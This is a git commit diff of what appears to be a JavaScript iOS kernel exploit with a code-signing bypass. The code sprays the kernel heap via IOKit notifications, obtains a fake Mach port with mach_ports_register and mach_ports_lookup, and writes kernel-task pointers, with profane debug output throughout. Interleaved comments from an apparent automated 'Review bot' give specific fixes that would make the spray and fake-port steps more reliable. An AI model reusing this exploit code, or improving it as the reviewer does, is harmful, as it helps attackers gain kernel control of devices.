| author | spv420 <spv@spv.sh> | 2022-07-29 12:21:35 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-29 12:21:35 -0400 |
| commit | 5ffc1a10b206f367c135330405833d7c59de56cb (patch) | |
| tree | dfdb6f62049d6c1ef1150ed35f1efe211f442305 | |
| parent | 66d18219be2629aa1c31c180d94f49b62812802a (diff) | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
| -rw-r--r-- | src/js/csbypass.js | 18 | ||||
| -rwxr-xr-x | src/js/kexp/exploit.js | 74 |
2 files changed, 37 insertions, 55 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 3065099..12388a0 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js 
@@ -25,27 +25,23 @@ function memcpy_exec(dst, src, size) {
 var width = malloc(4);
 var height = malloc(4);
 var pitch = malloc(4);
- var pixel_format = malloc(5);
+ var pixel_format = malloc(8);
 write_u32(width, PAGE_SIZE / (16 * 4));
 write_u32(height, 16);
 write_u32(pitch, read_u32(width) * 4);
 write_u32(pixel_format, 0x42475241); // ARGB
 write_u32(pixel_format + 4, 0x0); // ARGB
 printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
- dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
+ dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
 printf("dict: %p\n", dict);
- var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
 printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
- printf("fuck1\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
- printf("fuck2\n");
- 
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
- printf("fuck3\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
- printf("fuck4\n");
+ CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
 printf("fuck you\n");
 printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
 }
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js 
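Review bot: The four `CFDictionarySetValue` calls added at the end of this hunk use two different argument layouts — the BytesPerRow call passes `read_u32(read_u32(my_kIOSurfaceBytesPerRow))`, `test` and a trailing `0`, while the Width/Height/PixelFormat calls pass four separate 32-bit reads of the key followed by the value — and since the CoreFoundation function takes exactly (dict, key, value), presumably at most one of these layouts matches what the `CFDictionarySetValue` wrapper expects; the wrong one silently inserts a garbage key, so it is worth settling before more debugging on top of it. Those three calls also still build their value via `callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), …)` although the hunk introduces a `CFNumberCreate(...)` wrapper for `test`; `CFNumberCreate(0, kCFNumberSInt32Type, width)` (and likewise for `height`, `pixel_format`) would keep them consistent. `dict` is assigned without `var` and is never checked for 0 after `CFDictionaryCreateMutable` before `read_u32(dict)` and the inserts; `if (dict == 0) { printf("CFDictionaryCreateMutable failed\n"); return; }` would turn a failed allocation into a message instead of a bad read. The enclosing function begins before this hunk; only its closing brace is visible here.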
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
 var ret = 0;
 var master = shit_heap(4);
- host_get_io_master(mach_host_self(), master);
- io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ ret = host_get_io_master(mach_host_self(), master);
+ printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+// scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+ ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
 if (ret == KERN_SUCCESS) {
 ret = read_u32(err);
 }
+ printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
 return ret;
 }
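Review bot: `ret = host_get_io_master(mach_host_self(), master);` is now captured and logged but never acted on, so a failed lookup falls through to `io_service_add_notification_ool(read_u32(master), …)` with whatever the fresh `shit_heap(4)` cell happened to contain as the master port; `if (ret != KERN_SUCCESS) return ret;` right after the `yahtzee3` printf would make the spray fail closed instead of sending a message to a garbage port. Dereferencing `read_u32(master)` rather than passing the buffer address is the right change, but it only holds if the cell was written by a successful call, which is the same check. The commented-out `scall("printf", …)` line is dead code and should be dropped rather than committed. `err` is read here but is not a parameter of `spray(dict, size, port)`, so it is presumably a global scratch buffer; a short comment saying where it is allocated would help the next reader. The function's signature line sits just above the hunk, outside it.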
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
 // return 0x42603;
 }
-function mach_ports_lookup_shit_dealloc() {
- printf("fuck\n");
- var arrz = shit_heap(4);
- printf("fuck\n");
- write_u32(arrz, 0);
- printf("fuck\n");
- var sz = shit_heap(4);;
- printf("fuck\n");
- write_u32(sz, 3);
- printf("fuck\n");
-// var mts = mach_task_self();
- printf("fuck\n");
- calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
- puts("helo");
- printf("mpl success\n");
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
- printf("mpl success\n");
-
- for (var i = 0; i < read_u32(sz); i++) {
- if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
- printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
- mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
- printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
- }
- }
-
- return read_u32(read_u32(arrz) + 8);
-// return 0x42603;
-}
-
 var kernel_task_addr = 0;
 function get_kernel_task() {
 var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
 sched_yield();
 var dummy = shit_heap(4);
 for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- spray(big_buf, big_size, dummy);
+ var dummy = shit_heap(4);
+ spray(big_buf, read_u32(big_size), dummy);
 }
 sched_yield();
 var dummy = shit_heap(4);
 for (var i = 0; i < PORTS_NUM; i++) {
 // for (var i = 0; i < 8; i++) {
+ var dummy = shit_heap(4);
 if (i % 4 == 0) {
 printf("spray_ports %d\n", i);
 }
 write_u32(fp + (i << 2), spray_ports(1));
- spray(small_buf, small_size, dummy);
+ spray(small_buf, read_u32(small_size), dummy);
 }
 sched_yield(); 
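Review bot: The `var dummy = shit_heap(4);` added inside both loops makes the `var dummy = shit_heap(4);` immediately before each loop dead — `var` is function-scoped, so the loop-body declaration rebinds the same variable and the pre-loop allocation is never used. It also means one 4-byte heap cell per iteration (PORTS_NUM_PRESPRAY plus PORTS_NUM of them) is handed to `spray()` as its `port` out-parameter and then dropped; if the per-spray port cells are meant to outlive the loop they should be recorded the way `fp + (i << 2)` already records `spray_ports(1)`, otherwise the two pre-loop lines can simply be deleted. Switching to `read_u32(big_size)` / `read_u32(small_size)` treats the size variables as pointers to a u32 rather than numbers, which is presumably why the old calls misbehaved; a one-line comment at their allocation site saying they are heap cells would save the next reader the same confusion. The surrounding `again: while (true)` body starts and ends outside this hunk.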
@@ -489,15 +466,23 @@ again: while (true) {
 release_port_ptrs(read_u32(fp + (i << 2)));
 }
+// return;
+
+
+ var arrz = shit_heap(16);
+ write_u32(arrz, 0);
+ write_u32(arrz + 4, 0);
+ write_u32(arrz + 8, 0);
+ write_u32(arrz + 12, 0);
+ var sz = shit_heap(4);
+ write_u32(sz, 3);
+// mach_ports_lookup_shit_dealloc();
+ var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+ mach_ports_lookup(mach_task_self(), arrz, sz);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
- var arrmpt = shit_heap(16);
- write_u32(arrmpt, 0);
- write_u32(arrmpt + 4, 0);
- write_u32(arrmpt + 8, 0);
- write_u32(arrmpt + 12, 0);
- mach_ports_lookup_shit_dealloc();
- var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- mach_ports_lookup_shit();
+ var fake_port = read_u32(read_u32(arrz) + 8);
 printf("%d %s\n", ret__, mach_error_string(ret__));
 printf("r3gister done\n");
 // while (true) {
@@ -509,7 +494,7 @@ again: while (true) {
 /*
 * BEGIN JANK FUCKING HACK
 */
- var fake_port = mach_ports_lookup_shit();
+// var fake_port = mach_ports_lookup_shit();
 printf("fuck\n");
 printf("%x\n", fake_port);
 printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
 printf("fuck\n");
 write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 printf("fuck\n");
- write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, 0x73707621);
 printf("fuck\n");
 var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 printf("fuck\n"); |
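Review bot: `mach_ports_lookup(mach_task_self(), arrz, sz);` discards its return value and the new code then does `read_u32(read_u32(arrz) + 8)` unconditionally — if the lookup fails, `read_u32(arrz)` is still the `0` written a few lines earlier and the next read hits address 8. Capturing it, `var kr = mach_ports_lookup(mach_task_self(), arrz, sz);` followed by `if (kr != KERN_SUCCESS || read_u32(sz) < 3) { printf("mach_ports_lookup: %s\n", mach_error_string(kr)); }` and skipping the `fake_port` derivation on that path, would turn a crash into a diagnostic; the `r3gister` result `ret__` likewise deserves its check before, not after, the lookup. The deleted `mach_ports_lookup_shit_dealloc()` also destroyed the ports it found; the inlined replacement keeps the registered ports and the looked-up array alive on every pass of the `again:` loop, which may be intended for the exploit but should be stated in a comment. `write_u32(sz, 3)` is presumably an input count to `mach_ports_lookup`, which also writes the result count back through it; if the 3 is deliberate say so, otherwise drop it. The enclosing `again: while (true)` body starts and ends outside this hunk.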
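Review bot: `write_u32(ptr, 0x73707621);` replaces the computed `find_kerneltask() + kslide - BSDINFO_PID_OFFSET` with a fixed constant (the bytes read "spv!"), so the value written through `ptr` is now a tag rather than the kernel-task-derived address; nothing in the hunk says whether this is a deliberate canary for debugging the fake-port write or a regression, and the original line is only commented out. State the intent inline, e.g. `// DEBUG: "spv!" marker so the write is recognisable in a panic log; restore the find_kerneltask() path once the port write is confirmed`, or gate the two variants on a debug flag instead of leaving commented code. The `again: while (true)` body continues outside this hunk.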
